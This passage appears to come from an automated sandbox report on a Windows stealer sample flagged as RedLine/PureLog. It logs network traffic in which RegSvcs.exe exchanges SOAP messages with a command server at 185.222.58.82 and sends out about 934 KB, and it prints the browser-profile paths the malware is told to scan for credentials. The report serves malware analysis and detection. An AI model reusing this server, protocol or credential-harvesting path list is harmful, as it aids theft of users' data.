Dec 4, 2024 13:17:30.621438980 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.621480942 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.621536016 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.621546984 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.621656895 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.621666908 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.621786118 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.621794939 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.621810913 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.621819019 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.621921062 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.621931076 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.622034073 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.622051954 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.622188091 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.622196913 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.622273922 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.622282982 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.622354031 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.622364044 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.622519016 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.622529030 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.622581959 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.622596025 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.622610092 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.622646093 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.622684956 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.622718096 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.622831106 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.622848988 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.622946024 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.622956038 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.623011112 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.623167992 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.623308897 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.623363972 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.623430014 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.623486042 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.623594046 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.623603106 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.623720884 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.623739958 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.623821020 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.623878956 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.623934031 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.623953104 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624036074 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624054909 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624113083 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624123096 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624207973 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624217033 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624281883 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624291897 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624392986 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624402046 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624469042 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624479055 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624557018 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624566078 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624574900 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624627113 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624636889 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624644995 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624684095 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624692917 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624701023 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624708891 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624811888 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624820948 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624830008 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624850035 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624860048 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624870062 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624890089 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624907970 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624934912 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.624943972 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625019073 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625029087 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625046015 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625063896 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625139952 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625148058 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625166893 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625185013 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625245094 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625304937 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625313997 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625420094 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625430107 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625437975 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625490904 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625499964 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625508070 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625516891 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625605106 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625613928 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625638008 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625649929 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625658989 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625669003 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625716925 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625735044 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625806093 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.625823021 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.626147032 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.626200914 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.626266956 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.626322031 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.626331091 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.626338959 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.626355886 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.626379967 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.626432896 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.626450062 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.626476049 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.626486063 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.626503944 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.626758099 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.626815081 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.626912117 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.626920938 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.626960993 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.626970053 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.627017021 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.627026081 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.627074957 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.627093077 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.627160072 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.627168894 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.627208948 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.627232075 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.628057957 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.628076077 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.628084898 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:30.644628048 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:31.610866070 CET	55615	49744	185.222.58.82	192.168.2.4
Dec 4, 2024 13:17:31.630389929 CET	49741	55615	192.168.2.4	185.222.58.82
Dec 4, 2024 13:17:31.630882025 CET	49744	55615	192.168.2.4	185.222.58.82

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 4, 2024 13:17:22.408521891 CET	56891	53	192.168.2.4	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 4, 2024 13:17:22.408521891 CET	192.168.2.4	1.1.1.1	0x60b5	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 4, 2024 13:17:22.816539049 CET	1.1.1.1	192.168.2.4	0x60b5	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

185.222.58.82:55615

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	185.222.58.82	55615	744	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 13:17:15.052273035 CET	240	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 185.222.58.82:55615 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Dec 4, 2024 13:17:16.279328108 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 13:17:16.516541004 CET	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 04 Dec 2024 12:17:15 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Dec 4, 2024 13:17:21.586102962 CET	223	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 185.222.58.82:55615 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Dec 4, 2024 13:17:21.977878094 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 13:17:22.355334997 CET	1236	IN	HTTP/1.1 200 OK Content-Length: 4744 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 04 Dec 2024 12:17:21 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED] Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49741	185.222.58.82	55615	744	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 13:17:26.199942112 CET	221	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 185.222.58.82:55615 Content-Length: 934597 Expect: 100-continue Accept-Encoding: gzip, deflate
Dec 4, 2024 13:17:28.923417091 CET	294	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 04 Dec 2024 12:17:27 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49744	185.222.58.82	55615	744	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 13:17:29.045960903 CET	241	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 185.222.58.82:55615 Content-Length: 934589 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Dec 4, 2024 13:17:31.610866070 CET	408	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 04 Dec 2024 12:17:30 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Target ID:	0
Start time:	07:17:09
Start date:	04/12/2024
Path:	C:\Users\user\Desktop\MfzXU6tKOq.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\MfzXU6tKOq.exe"
Imagebase:	0x10000
File size:	570'880 bytes
MD5 hash:	3D63B777F65056B236BA51180CD37CE0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1841259145.0000000004FA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1839022362.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:17:13
Start date:	04/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x480000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:17:13
Start date:	04/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.5%
Total number of Nodes:	260
Total number of Limit Nodes:	11

Executed Functions

Function 06ABF260 Relevance: 3.1, Strings: 2, Instructions: 642
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TOf, xrefs: 06ABF92F
TOf, xrefs: 06ABF954

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID: TOf$TOf
API String ID: 0-895418668
Opcode ID: 3d1de0a723faa078927e3e08592161f1d829d81fb2c5682ef74bfa356493c3cb
Instruction ID: 47241e92241b1dbfd5b6e356c12f6b08718f0a637132d5f9a3173d550aa48817
Opcode Fuzzy Hash: 3d1de0a723faa078927e3e08592161f1d829d81fb2c5682ef74bfa356493c3cb
Instruction Fuzzy Hash: 6A328C74B012049FDB99EB79C950BEEBBFAAF88300F184469E5059B3A2CB35DD41CB51

Function 04927278 Relevance: 2.3, Strings: 1, Instructions: 1043
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

hNf, xrefs: 049279B8

Memory Dump Source

Source File: 00000000.00000002.1840840096.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4920000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID: hNf
API String ID: 0-1940841836
Opcode ID: 6e0710791bbf35f83384e092412fd0107aa49c4537411e8fab26ea28a48e9f5b
Instruction ID: 9f464cc931dbc0e403150db8750b98324f3bb8179cf07309348135b440d267df
Opcode Fuzzy Hash: 6e0710791bbf35f83384e092412fd0107aa49c4537411e8fab26ea28a48e9f5b
Instruction Fuzzy Hash: EFB2C734A402298FDB54DF64C984ADDB7B2FF8A304F1181E9D949AB365DB31AE85CF40

Function 0492726A Relevance: 2.2, Strings: 1, Instructions: 945
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

hNf, xrefs: 049279B8

Memory Dump Source

Source File: 00000000.00000002.1840840096.0000000004920000.00000040.00000800.00020000.00000000.sdmp, Offset: 04920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4920000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID: hNf
API String ID: 0-1940841836
Opcode ID: 7023b0663f7212ff5f6410fa2b18aec658624fc3b574c15621d31bb6feb02bc8
Instruction ID: 5d0dc2a00d0a59c53113d227989f12b2c642a127bb4cd6cdeb5cbab99b565025
Opcode Fuzzy Hash: 7023b0663f7212ff5f6410fa2b18aec658624fc3b574c15621d31bb6feb02bc8
Instruction Fuzzy Hash: 32A2D734A40229CFDB54DF64C984AE9B7B2FF8A304F1181E9D9496B365DB31AE85CF40

Function 06ABDF7E Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1841901090.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_MfzXU6tKOq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ee4d569ad141a4df7c133a7899056cc36ca3e3ef74108c7b968931daa41eb82
Instruction ID: 978937f8559d97a1c096c09c098e8f3eed2177d909c5cf96b1fc26b6df62e747
Opcode Fuzzy Hash: 4ee4d569ad141a4df7c133a7899056cc36ca3e3ef74108c7b968931daa41eb82
